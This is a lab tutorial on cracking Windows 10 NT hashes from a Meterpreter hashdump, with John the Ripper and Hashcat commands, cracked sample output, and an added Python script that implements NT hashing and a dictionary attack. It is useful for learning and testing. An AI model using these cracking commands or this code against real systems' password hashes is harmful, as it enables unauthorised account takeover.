In our last tutorial we took a look at how to gain access to a Windows machine, elevate the user privileges and then get a hashdump of the password hashes for the user accounts using Meterpreter.
Now we have a text file on our desktop containing those hashes, but they are in an unreadable format. A hash cannot be reversed: cracking it means guessing candidate passwords, hashing each one exactly the way Windows does (the NT hash is MD4 over the UTF-16LE encoding of the password, with no salt) and looking for a match. This is where two tools on Kali, John the Ripper and Hashcat, come in handy. In this tutorial we will look at how to crack the Windows 10 password hashes we collected in the hashdump using these tools.

We have saved this .txt file on our desktop as hash.txt.
Now open a new terminal window and enter john on its own to see the usage summary.
┌──(kali㉿kali)-[~]
└─$ john
You will get a lot of options! Here we are going to do something really simple, so we can ignore most of them; we will explore them in future posts. One thing to be clear about first: --show does not crack anything by itself. It prints the hashes John has already cracked and recorded in its pot file (~/.john/john.pot). So if this is a fresh hash file, run `john --format=NT Desktop/hash.txt` without --show first and let it finish (with no other options John tries single-crack mode, then its built-in wordlist, then incremental brute force). --format=NT tells John the file contains NT (NTLM) hashes in the pwdump-style user:RID:LM:NT::: layout that hashdump produces. Then display the results:
┌──(kali㉿kali)-[~]
└─$ john --show --format=NT Desktop/hash.txt
Administrator:Passw0rd!:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
DefaultAccount::503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest::501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IEUser:Passw0rd!:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
4 password hashes cracked, 2 left
We were successful in cracking the passwords for IEUser and Administrator. Both are the same, Passw0rd!, which is the default password on the Windows 10 VirtualBox machine, and it cracks in just a few seconds. Two other things in this output are worth understanding. DefaultAccount and Guest are listed as cracked with an empty password because their NT hash, 31d6cfe0d16ae931b73c59d7e0c089c0, is the NT hash of the empty string: no password is set on those (disabled by default) accounts, so there was nothing to crack. And the LM field is aad3b435b51404eeaad3b435b51404ee for every account, which is the LM hash of an empty password; modern Windows no longer stores LM hashes, so only the NT hash is worth attacking, which is why we use --format=NT.

Now we will change the password to something a little less obvious. I also added a password hint. Then I re-run the steps for method 2 in the previous tutorial to get a new hashdump, along with the password hint.

Crack using Hashcat
This time we will use Hashcat to crack the password, and we will use a dictionary attack. In this case we have the rockyou.txt dictionary (Kali ships it compressed as /usr/share/wordlists/rockyou.txt.gz, so it needs to be decompressed once before use). A password dictionary is simply a text file with one candidate password per line; the tool hashes each line and compares the result with the target hashes, so the bigger and better targeted your dictionary, the better your chance of a hit. You can find many of these dictionaries online, and they are often built from passwords leaked in real breaches: rockyou.txt itself is the list recovered from the 2009 RockYou breach. As my chosen password was not in the standard rockyou.txt, I added it for the purposes of this tutorial.
So we have rockyou.txt on our desktop, and we have the new hashdump, which I edited down to just two hashes to crack, the Administrator and the IEUser.
Now open up a terminal window and fire off the following:
┌──(kali㉿kali)-[~]
└─$ hashcat -m 1000 Desktop/hash.txt Desktop/rockyou.txt
Here -m 1000 selects hashcat's NTLM (NT hash) mode, the first path is the hash file and the second is the wordlist. Hashcat is not decrypting anything, because a hash cannot be decrypted: for every line of rockyou.txt it computes the NT hash and checks whether it matches one of the hashes in hash.txt. Hashcat understands the user:RID:LM:NT::: layout of a hashdump for this mode; if your version rejects the lines, cut the file down to the bare NT hashes (the fourth colon-separated field of each line) and feed it those instead.
And we get a result! The cracked password is printed next to its hash in the output (highlighted in the screenshot below).

Every hash you crack is saved to hashcat.potfile (on Kali it lives in ~/.local/share/hashcat/). It is a list of hash:plaintext pairs for everything you have already cracked, so you never have to crack the same hash again. In the above case I had already cracked the Administrator hash with hashcat earlier, so it was in my potfile; if you run the same command again, hashcat tells you that all hashes were found in the potfile and suggests using --show to display them.

So if we run the command with --show added
┌──(kali㉿kali)-[~]
└─$ hashcat -m 1000 --show Desktop/hash.txt Desktop/rockyou.txt
we get every hash from this file that is already in the potfile, together with its plaintext. --show only reads the potfile, so no cracking happens and the wordlist argument plays no part here.
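To make concrete what both tools are doing with a hashdump (hash each candidate, compare, remember what cracked), here is an added example; it is not part of the original tutorial and not code from John the Ripper or Hashcat. It implements the NT hash (MD4 over UTF-16LE) in pure Python, parses user:RID:LM:NT::: lines, runs a dictionary attack over a small constructed wordlist, and keeps a pot-file style dictionary so a second run answers already-cracked hashes without hashing the wordlist again. The hashdump lines are those of the four accounts shown earlier in this post; the wordlist is made up for the example.

```python
"""Added example: an NT-hash dictionary attack with a pot-file cache.

Not the tutorial's code and not John/Hashcat code; written to show what those
tools do with a Meterpreter hashdump. MD4 is implemented here because
hashlib's "md4" is often unavailable under OpenSSL 3.
"""
import struct

MASK32 = 0xFFFFFFFF
# NT hash of the empty string: an account with this hash has no password set.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """MD4 as specified in RFC 1320."""
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r2_idx = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3_idx = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):                          # round 1: F = (b & c) | (~b & d)
            f = (b & c) | (~b & d)
            a = _rotl((a + f + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                          # round 2: majority function
            g = (b & c) | (b & d) | (c & d)
            a = _rotl((a + g + x[r2_idx[i]] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                          # round 3: xor
            a = _rotl((a + (b ^ c ^ d) + x[r3_idx[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(s + v) & MASK32 for s, v in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """Windows NT hash: MD4 over the UTF-16LE encoding of the password, no salt."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text: str) -> dict:
    """user:RID:LM:NT::: lines (Meterpreter hashdump layout) -> {user: nt_hash}."""
    hashes = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) >= 4 and len(fields[3]) == 32:
            hashes[fields[0]] = fields[3].lower()
    return hashes


def crack(hashes: dict, wordlist, pot: dict) -> dict:
    """Dictionary attack over `wordlist`. `pot` maps nt_hash -> plaintext and is
    updated in place, like john.pot / hashcat.potfile: anything cracked before is
    answered from it and not hashed again. Returns {user: plaintext} for cracked users."""
    cracked, pending = {}, {}
    for user, h in hashes.items():
        if h == EMPTY_NT:
            pot[h] = ""                              # blank password, nothing to guess
        if h in pot:
            cracked[user] = pot[h]
        else:
            pending.setdefault(h, []).append(user)   # same hash -> same password (no salt)
    for word in wordlist:
        if not pending:
            break
        h = nt_hash(word)
        if h in pending:
            pot[h] = word
            for user in pending.pop(h):
                cracked[user] = word
    return cracked


# Hashdump lines for the accounts shown in the tutorial; the wordlist is constructed for this example.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IEUser:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
"""
SAMPLE_WORDLIST = ["123456", "password", "letmein", "Passw0rd!", "qwerty"]


if __name__ == "__main__":
    pot = {}
    first = crack(parse_pwdump(SAMPLE_HASHDUMP), SAMPLE_WORDLIST, pot)
    for user, plain in first.items():
        print(f"{user}:{plain!r}")
    # Second run with an empty wordlist: everything is answered from the pot.
    again = crack(parse_pwdump(SAMPLE_HASHDUMP), [], pot)
    print("from pot:", again == first)
```

Two behaviours of the real tools fall out of this directly: accounts with the empty-string hash are reported as cracked with a blank password without any guessing, and because NT hashes are unsalted, one hash lookup answers every account sharing that password (Administrator and IEUser here), which is also why a pot file can be keyed on the hash alone.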

Crack using John The Ripper
Just for the sake of completeness, I'll show you that I was also able to get this using the same dictionary with John the Ripper:
┌──(kali㉿kali)-[~]
└─$ john --format=NT Desktop/hash.txt --wordlist=Desktop/rockyou.txt
This gave us the output

You can see it also picked up N@ck2302 from our dictionary. John the Ripper also keeps a pot file of previously cracked hashes (~/.john/john.pot) so you don't waste time cracking them again. To list the cracked entries for this file, run
┌──(kali㉿kali)-[~]
└─$ john --show --format=NT Desktop/hash.txt
What I like about John the Ripper compared to Hashcat is that --show also prints the username that goes with each password, whereas Hashcat by default keeps only the hash and the plaintext. Hashcat can do it too: add --username to the cracking run and to the --show run, and it prints user:hash:plaintext instead.

And that's all folks: a simple introduction to cracking Windows 10 password hashes retrieved from a Meterpreter hashdump.